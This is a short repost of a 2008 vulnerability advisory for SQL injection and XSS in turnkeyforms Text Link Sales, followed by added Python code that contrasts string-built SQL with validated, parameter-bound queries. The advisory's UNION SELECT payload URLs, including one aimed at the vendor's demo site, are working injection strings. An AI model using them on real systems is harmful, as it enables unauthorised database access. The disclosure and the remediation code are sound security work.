"The Devil Is the Voice Within; Heed That Voice"

-Zorlu BUĞRAHAN-

Saturday, 15 November 2008

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability


link: http://www.milw0rm.com/exploits/7124

Discovered By: ZoRLu

Exploit: SQL injection

http://localhost/script/admin.php?a=users&id=[SQL]


[SQL]

999+union+select+1,user(),database(),version(),5,6,7--


SQL injection on the demo site:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--


XSS:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]
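
Both issues come from the `id` parameter being used without validation or encoding. The following is an added example, not code from the application or from the advisory: a Python/sqlite3 stand-in that puts the string-built query beside an integer allow-list, a bound parameter and HTML encoding. The table layout, function names and sample input are assumptions made for illustration.

```python
import html
import sqlite3

# Constructed stand-in for the application's user table (7 columns, matching
# the seven-column UNION in the advisory); the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT,"
               " site TEXT, c5 TEXT, c6 TEXT, c7 TEXT)")
    db.execute("INSERT INTO users VALUES (1,'alice','a@example.test','s','','','')")
    return db

def lookup_vulnerable(db, raw_id):
    # Flawed pattern: the request value is pasted into the SQL text,
    # so anything after the number is parsed as SQL.
    return db.execute("SELECT * FROM users WHERE id = " + raw_id).fetchall()

def parse_id(raw_id):
    # Allow-list: ASCII decimal digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def lookup_hardened(db, raw_id):
    # Validate first, then bind as a parameter so it can only ever be data.
    return db.execute("SELECT * FROM users WHERE id = ?",
                      (parse_id(raw_id),)).fetchall()

def render_id(raw_id):
    # Any echo of the parameter into HTML is entity-encoded (the XSS half).
    return '<input name="id" value="%s">' % html.escape(raw_id, quote=True)

# Constructed input: the advisory's UNION shape, URL-decoded, with constants
# in place of the MySQL functions so it parses under SQLite.
SAMPLE = "999 union select 1,2,3,4,5,6,7--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, SAMPLE))
    try:
        lookup_hardened(db, SAMPLE)
    except ValueError as exc:
        print("hardened: rejected:", exc)
    print(render_id('"><b>'))
```
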
